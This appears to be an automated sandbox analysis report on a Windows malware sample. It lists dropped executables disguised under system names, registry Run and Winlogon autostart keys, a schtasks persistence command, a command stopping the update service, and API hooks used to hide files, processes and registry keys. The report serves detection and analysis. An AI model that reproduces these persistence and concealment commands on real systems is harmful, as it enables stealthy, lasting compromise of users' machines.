Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75002\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Windows\Resources\audiodg.exe	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\_bz2.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75002\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\FslAQrtN.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\audiodg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI73082\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\qNclTfFu.log	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	File created: C:\ProgramData\Microsoft\based.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	File created: C:\ProgramData\Microsoft\hacn.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	File created: C:\ProgramData\setup.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	File created: C:\ProgramData\svchost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	File created: C:\ProgramData\main.exe	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Windows\Logs\SettingSync\cmd.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Windows\Resources\audiodg.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\IibrXntG.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\gngVTpTJ.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\FslAQrtN.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\NvkaspdC.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\texuZkSn.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\bRVpFOxY.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\NMiIKuxG.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\uLCuFLgt.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\jXYEVzlL.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\SQHZBNGw.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\qVMExOgA.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\OaRiuQGD.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\DhbSKVVV.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\qNclTfFu.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\QXsqPQUy.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\FjOAgEaQ.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\etdFcppU.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\CyikYrPX.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\bIypVceb.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\qejEhBzx.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\NedIeTjA.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Users\user\Desktop\cAOXqsEV.log	Jump to dropped file

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmd

Creates an undocumented autostart registry key

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audiodg
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run biuvCXdylsCxguP
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmd
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tasklist

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Windows\Logs\SettingSync\cmd.exe'" /f

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmd
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmd
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmd
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmd
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audiodg
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audiodg
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audiodg
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audiodg
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tasklist
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tasklist
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tasklist
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tasklist
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run biuvCXdylsCxguP
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run biuvCXdylsCxguP
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audiodg
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audiodg
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audiodg
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audiodg

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\sc.exe sc stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\ProgramData\setup.exe

Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\WXYUBNJMNLAE.TMP

Hooks files or directories query functions (used to hide files and directories)

Source: winlogon.exe

IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile

Hooks processes query functions (used to hide processes)

Source: winlogon.exe

IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation

Hooks registry keys query functions (used to hide registry keys)

Source: winlogon.exe

IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Modifies the prolog of user mode functions (user mode inline hooks)

Source: winlogon.exe

User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF

Source: C:\Users\user\Desktop\iqA8j9yGcd.exe

Code function: 0_2_00007FF72B8D5830 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,

0_2_00007FF72B8D5830

Source: C:\ProgramData\main.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\ProgramData\main.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\main.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
